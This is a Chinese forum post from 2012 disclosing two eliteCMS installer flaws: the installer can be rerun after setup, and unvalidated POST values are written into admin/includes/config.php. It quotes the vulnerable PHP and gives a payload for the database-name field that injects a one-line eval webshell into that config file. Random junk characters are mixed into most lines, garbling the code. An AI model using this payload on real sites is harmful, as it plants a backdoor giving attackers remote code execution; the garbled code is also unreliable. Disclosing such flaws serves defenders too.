eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
+ T6 L; c- w) ^. C3 L
% k& a) f9 h( T/ x另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php, U* k' d) x! E9 i8 Y( ^) j
我们来看代码:
% S! f; |1 L* [* ?+ o* X$ h! M
4 Z! L* X6 `* b...8 ?6 l$ _* E2 {# N( V" `2 a, [
elseif ($_GET['step'] == "4") {
8 @2 P3 _3 H X8 @ $file = "../admin/includes/config.php";# A M5 ?" |/ Q. ^& E: d4 g
$write = "<?php\n";+ W' s8 O8 a, I" o$ F a
$write .= "/**\n";
3 n6 I7 @* _$ W+ t* y $write .= "*\n";
- n! |+ e; p' b" y $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
& s' F p# w' _" A5 F3 Q3 e...略..." T; c( H2 X. o2 X
$write .= "*\n";
! o" c- j/ I* v/ r0 D8 A $write .= "*/\n";% X3 |2 s/ G2 F( k3 `0 l
$write .= "\n";" c( Y H. I; \7 O
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";! f/ M" s' ~' c7 G! K
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";( k, ~6 F- G& M1 V c
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";3 F+ W1 L' I1 N( L- U( I+ d
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
+ ^% Y$ G2 c I n $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
3 I! U9 ~; q" J; e# h0 u( M' b $write .= "if (!\$connection) {\n";( L6 S O, r* j2 v, x7 ~) N9 x
$write .= " die(\"Database connection failed\" .mysql_error());\n";
0 x: f3 Q# S5 A1 H8 s3 q2 d+ ` $write .= " \n";
" I% E, m) {6 ]6 M5 F' Z $write .= "} \n";
0 b1 M- G P, @) o $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";& d, v7 i# V% K, I& m1 W
$write .= "if (!\$db_select) {\n";1 V: R& w6 h8 f6 q& U% s& p! o
$write .= " die(\"Database select failed\" .mysql_error());\n";0 h. J" J( ~7 v; K1 K) H4 ~
$write .= " \n";
4 A4 [7 P2 z3 M) k6 J7 @+ c $write .= "} \n";
0 Z$ g$ h u1 I. n $write .= "?>\n";$ Z" _) E5 ?& _: `
( `+ Z+ r' H9 i/ b" V O6 b+ |
$writer = fopen($file, 'w');
6 b' D8 A, _, p7 C4 D, A...
2 p, \8 i z* @% q
3 X& J, U7 J6 ]9 [0 X0 |1 Z4 c Q# C. U在看代码:
+ G8 k/ }. D/ L. r2 @
# H9 G& Z! d1 R) m: E$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
! ] Q3 b r" V8 h, E8 X! F$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
, h; V: }) F7 B2 [( }0 J. B! ?$_SESSION['DB_USER'] = $_POST['DB_USER'];
- b& S& E# h; a$_SESSION['DB_PASS'] = $_POST['DB_PASS'];) j3 ]4 A2 ?1 r7 f; k( l; N9 b
% s( X6 V. R+ B! t
取值未作任何验证" e, V" n ?: k0 U0 W0 M: ^
如果将数据库名POST数据:7 E2 q Y0 R4 h6 V, D# W/ M1 o0 D
5 |& L. y( i2 ?+ L3 l/ p& y! n
"?><?php eval($_POST[c]);?><?php
2 i0 u' j7 X8 }; Q
& ~. g% [7 X7 q0 W; O& n, H9 t4 q2 e将导致一句话后门写入/admin/includes/config.php5 w1 C! R5 c) J8 [$ ^& J
|
发表于 2012-11-18 13:59:27
收藏
支持
反对